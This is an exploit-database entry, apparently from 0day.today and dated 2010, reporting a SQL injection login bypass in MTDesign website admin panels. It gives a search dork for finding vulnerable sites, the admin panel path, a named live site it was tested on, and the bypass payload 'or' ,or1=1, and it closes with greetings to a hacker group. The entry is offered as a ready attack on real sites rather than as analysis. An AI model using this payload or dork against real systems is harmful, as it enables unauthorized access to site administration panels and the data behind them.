id: 13288
date: 07/11/2010
title: MTDesing SQL Login Authentication by pass Vulnerability
author: Curly
cves: 

=======================================================
MTDesing SQL Login Authentication by pass Vulnerability
=======================================================


######################################################
# [+]: MTDesing SQL Login by pas vuln.
#
# Date: 07.57 10.07.210
#
# Author: Curly
#
# Sofware Link: Mtdesign.be
#
# Tested On:?http://www.full-house.be/webadmin/
#
#Dork:Realisation by mtdesign
#
#Panel:/webadmin/
#
#Exp: 'or' ,or1=1
#
#Greetz: Thanks : Worldhackerz.com and All member
#
#Curly*WorldHackerz.com
#
##############################################




#  0day.today [2023-03-22]  #